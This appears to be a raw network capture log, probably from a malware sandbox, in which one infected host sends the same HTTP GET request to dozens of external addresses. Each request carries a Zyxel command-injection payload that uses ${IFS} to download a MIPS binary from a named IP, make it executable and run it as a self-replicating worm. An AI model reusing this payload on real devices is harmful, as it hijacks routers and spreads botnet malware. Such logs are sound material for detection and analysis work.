                                            Jan 14, 2024 15:50:35.334806919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3198192.168.2.2348788130.240.207.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334851980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3199192.168.2.2359190195.120.125.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334860086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3200192.168.2.2334686168.188.192.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334893942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3201192.168.2.2345846194.130.210.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334934950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3202192.168.2.233671496.172.35.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334956884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3203192.168.2.2355012133.109.151.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.334990978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3204192.168.2.2336166176.131.176.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335026026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3205192.168.2.236034088.84.171.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335047007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3206192.168.2.234897092.126.89.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335086107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3207192.168.2.2348814174.24.17.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335134029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3208192.168.2.2351164146.70.123.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335155010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3209192.168.2.234962225.47.136.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335164070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3210192.168.2.235593461.217.175.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335182905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3211192.168.2.235765062.43.36.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335222960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3212192.168.2.2336394173.254.168.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335237980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3213192.168.2.2354518120.188.111.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335283041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3214192.168.2.234690690.97.72.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335318089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3215192.168.2.2350304137.191.97.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335365057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3216192.168.2.234278460.238.65.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335401058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3217192.168.2.2341922113.179.133.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335432053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3218192.168.2.2336374195.214.75.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335455894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3219192.168.2.2351554124.133.63.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335489988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3220192.168.2.2333968166.77.247.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335501909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3221192.168.2.23381429.8.15.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335515022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3222192.168.2.236052478.79.101.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335552931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3223192.168.2.2333924137.78.231.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335568905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3224192.168.2.2338094138.42.218.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335602999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3225192.168.2.23521329.36.189.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335612059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3226192.168.2.233952649.244.213.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335670948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3227192.168.2.235376458.207.166.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335671902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3228192.168.2.2342464195.8.162.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335685968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3229192.168.2.2357164188.40.250.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335689068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3230192.168.2.2354460190.234.167.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.335747004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3231192.168.2.235115234.142.179.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339261055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3232192.168.2.233364880.141.177.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339279890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3233192.168.2.235872497.222.62.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339308023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3234192.168.2.2350214219.184.93.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339324951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3235192.168.2.2347182130.53.168.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339348078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3236192.168.2.2344222197.255.9.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339402914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3237192.168.2.2340352189.111.206.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339437008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3238192.168.2.234614235.100.140.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339451075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3239192.168.2.235191636.137.113.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339509010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3240192.168.2.234379641.162.113.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339533091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3241192.168.2.235610062.94.62.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339555979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3242192.168.2.2338520126.102.125.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339581966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3243192.168.2.235418262.98.33.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339639902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3244192.168.2.2348858113.76.242.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339648008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3245192.168.2.233996645.1.20.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339690924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3246192.168.2.2352486147.16.197.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339728117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3247192.168.2.2352800159.73.106.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339744091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3248192.168.2.2360786122.253.237.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339787006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3249192.168.2.234285479.226.95.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339807034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3250192.168.2.234080645.182.119.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339816093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3251192.168.2.235318248.88.36.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339862108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3252192.168.2.2348450143.14.152.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339868069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3253192.168.2.2334764198.83.62.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:35.339903116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3254192.168.2.2345358146.78.107.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351216078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3255192.168.2.2339972220.17.245.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351260900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3256192.168.2.23609809.191.144.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351315022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3257192.168.2.234175218.136.183.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351345062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3258192.168.2.2339638148.128.76.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351370096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3259192.168.2.235264059.101.64.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.351423979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3260192.168.2.2355856138.9.79.92443
                                            TimestampBytes transferredDirectionData
